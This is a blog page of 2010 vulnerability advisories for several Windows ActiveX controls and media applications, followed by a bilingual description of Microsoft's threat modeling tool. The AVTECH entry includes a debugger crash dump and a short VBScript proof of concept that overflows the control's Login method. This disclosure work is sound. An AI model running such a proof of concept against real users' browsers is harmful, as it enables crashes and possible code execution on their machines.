Posts Tagged ‘ application

Edrawsoft Security Advisories

EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC

– EDraw Flowchart ActiveX Control version 2.3 suffers from a buffer overflow vulnerability when parsing .edd file format resulting in an application crash and overwritten few memory registers which can aid the attacker toexecute arbitrary code.

Details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4935.php

——————————————–

EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)

– EDraw Flowchart ActiveX Control EDImage.OCX suffers from a denial of service vulnerability when parsing large amount of bytes to the OpenDocument() function, resulting in browser crash and unspecified memory corruption.

Details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4936.php

Olly

AVTECH Software (AVC781Viewer.dll) ActiveX Multiple Remote Vulnerabilities

Vendor: AVTECH Software, Inc.
Product Web Page: http://www.avtech.com

Summary: AVTECH Software, a private corporation founded in 1988, is a computer software and
hardware manufacturer specializing in providing Windows NT/2K/XP/2K3 products to monitor
multi-OS computers and network issues throughout a department or an entire enterprise.
Once issues or events occur, AVTECH Software products use today’s most advanced alerting
technologies to communicate critical and important status information to remote system
managers and IT professionals via mobile phones, pagers, PDAs, email, the web and more.
Automatic corrective actions can also be taken to immediately resolve issues, run scripts,
and shutdown/restart servers or applications.

AVTECH Software is now the premier worldwide manufacturer of environment monitoring equipment
specifically designed to monitor today’s advanced computer rooms and data centers. Our Room Alert
and TemPageR products are used to monitor environmental conditions in many of the world’s most
secure data centers and are installed in almost every branch of the US government.

Description: AVTECH Software’s AVC781Viewer ActiveX Control suffers from multiple remote vulnerabilities
such as buffer overflow, integer overflow and denial of service (IE crash). This issue is
triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to execute arbitrary machine code in the context of
the affected application, facilitating the remote compromise of affected computers. Failed
exploit attempts likely result in browser crashes.

——————————————-

Exception Code: ACCESS_VIOLATION
Disasm: 10006C23    MOV [EAX],CL    (AVC_AX_724_VIEWER.dll)

Seh Chain:
————————————————–
1     10022F68     AVC_AX_724_VIEWER.dll
2     FC2950     VBSCRIPT.dll
3     7C839AC0     KERNEL32.dll

Called From                   Returns To
————————————————–
AVC_AX_724_VIEWER.10006C23    AVC_AX_724_VIEWER.10044508
AVC_AX_724_VIEWER.10044508    AVC_AX_724_VIEWER.100097B0
AVC_AX_724_VIEWER.100097B0    8244C8B

Registers:
————————————————–
EIP 10006C23
EAX BAADF06D
EBX 00180724 -> Uni: defaultV
ECX 0013EE41 -> 24001827 -> Uni: ‘$’$
EDX 00182801 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 001827BC -> Uni: defaultV
ESI 00180724 -> Uni: defaultV
EBP 00FE4658 -> 10044530 -> Asc: 0E0E
ESP 0013EE40 -> 001827BC

Block Disassembly:
————————————————–
10006C12    MOV EAX,[EBP+144]
10006C18    ADD EAX,60
10006C1B    JMP SHORT 10006C20
10006C1D    LEA ECX,[ECX]
10006C20    MOV CL,[EDX]
10006C22    INC EDX
10006C23    MOV [EAX],CL      <— CRASH
10006C25    INC EAX
10006C26    TEST CL,CL
10006C28    JNZ SHORT 10006C20
10006C2A    MOV EAX,[ESP+20]
10006C2E    ADD EAX,-10
10006C31    LEA ECX,[EAX+C]
10006C34    OR EDX,FFFFFFFF
10006C37    LOCK XADD [ECX],EDX

ArgDump:
————————————————–
EBP+8    00FE4658 -> 10044530 -> Asc: 0E0E
EBP+12    001862FC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16    0018AB44 -> Uni: defaultV
EBP+20    00180A54 -> Uni: defaultV
EBP+24    00000001
EBP+28    00000001

Stack Dump:
————————————————–
13EE40 BC 27 18 00 24 07 18 00 F4 EE 13 00 74 1F 18 00  […………t…]
13EE50 AC F1 13 00 68 2F 02 10 FF FF FF FF B7 9B 00 10  [….h………..]
13EE60 00 28 18 00 74 1F 18 00 BC 27 18 00 24 07 18 00  [….t………..]
13EE70 5C 07 18 00 F4 EE 13 00 00 00 00 00 D8 DD 47 00  [\………….G.]
13EE80 58 46 FE 00 08 00 00 00 08 00 13 00 44 4A 12 77  [XF……….DJ.w]

=============================================
=============================================

Proof Of Concept:
###############################

<object classid=’clsid:8214B72E-B0CD-466E-A44D-1D54D926038D’ id=’kungfuhustle’ />
<script language=’vbscript’>

targetFile = “C:\WINDOWS\system32\AVC_AX_724_VIEWER.dll”
prototype  = “Sub Login (

ByVal Username As String,
ByVal Password As String,
ByVal MediaType As String,
ByVal ConnectType As String

)”
memberName = “Login”
progid     = “AVC781Viewer.CV781Object”
argCount   = 4

arg1=String(1010, “A”)
arg2=”defaultV”
arg3=”defaultV”
arg4=”defaultV”

kungfuhustle.Login arg1 ,arg2 ,arg3 ,arg4

</script>

More info: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4934.php

Aladdin eToken PKI Client v4.5 Virtual File Handling Unspecified Memory Corruption PoC

Summary

The eToken PKI Client is the software that enables eToken USB operation and the implementation of eToken PKI-based solutions. These solutions include certificate-based strong two-factor authentication, encryption and digital signing. With the PKI Client your PKI solutions become highly secure, extremely convenient and portable, as you can easily and securely generate and store PKI keys on-board eToken smart card-based devices.

Description

eToken PKI Client is prone to an unspecified memory-corruption vulnerability. An attacker can exploit this issue by tricking a victim into opening a malicious ETV file to execute arbitrary code and to cause denial-of-service conditions.

Aladdin

More info: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4933.php

J. River Media Jukebox 12 MP3 File Handling Remote Heap Overflow PoC

Media Jukebox 12 is a media player application for playing various media files on a Windows machine.

Desc: Media Jukebox 12 suffers from a heap overflow vulnerability when processing .mp3 files and its metadata (ID3 tags). When a malicious .mp3 file is played the application pops out an error message and crashes. The ECX register gets overwritten allowing the attacker the possibility of system access remotely or localy.

More Info: http://zeroscience.mk/mk/vulnerabilities/ZSL-2010-4930.php

Microsoft Threat Analysis and Modeling Tool

Основната функција на алатката од Мајкрософт, Threat Analysis & Modeling v2.1 или Threat Analysis & Modeling v3.0 beta е да се идентификуваат заканите, додека го олеснуваат процесот на дефинирање на стратегија за безбедност. Иаку не сте експерт за информациска безбедност, сега имате можност да доследно и објективно ги идентификувате заканите кон вашата софтверска апликација.

Креирање на модел за закана користејќи ја MAT алатката е процес во три фази. Прво, го дефинирате контекстот на вашата апликација. Второ, ги моделирате вашите закани на врвот од контекстот на апликацијата. Трето, го пресметувате ризикот кој е асоциран со секоја закана. Откако ги извршувате трите фази, можете да ги асимилирате вашите модели на закани преку аналитика, визуелизација и извештаи.

Алатката автоматски генерира потенцијални закани на вашата софтверска апликација врз основа на информациите кои вие ги внесувате. Исто така, Threat Analysis & Modeling алатката има способност да ги асимилира информациите кои вие ги внесувате за да развие безбедносни артифакти како што се контрола на матрици за пристап, проток на податоци и дијаграми на проток на доверба и видливи прилагодливи извештаи.

Преземено од Getting Started.rtf преку апликацијата.

/

The core function of the Threat Analysis & Modeling tool is to identify threats, while facilitating the process of defining a security strategy. Even if you are not a security subject-matter expert, you now have the ability to consistently and objectively identify threats to your software application.

Creating a threat model using the Microsoft Application Security Threat Analysis & Modeling tool is a three-phase process. First, you define your application context. Second, you model your threats on top of your application context. Third, you measure the risk that is associated with each threat. Once you have completed these phases, you can assimilate your threat models through analytics, visualizations, and reports.

The Threat Analysis & Modeling tool automatically generates potential threats to your software application, based solely on known information that you provide. The Threat Analysis & Modeling tool also has the capability to assimilate the information you provide to build security artifacts such as access control matrices, data flow and trust flow diagrams, and focused, customizable reports.

Taken from Getting Started.rtf within application.

Повеќе инфо: http://blogs.msdn.com/threatmodeling/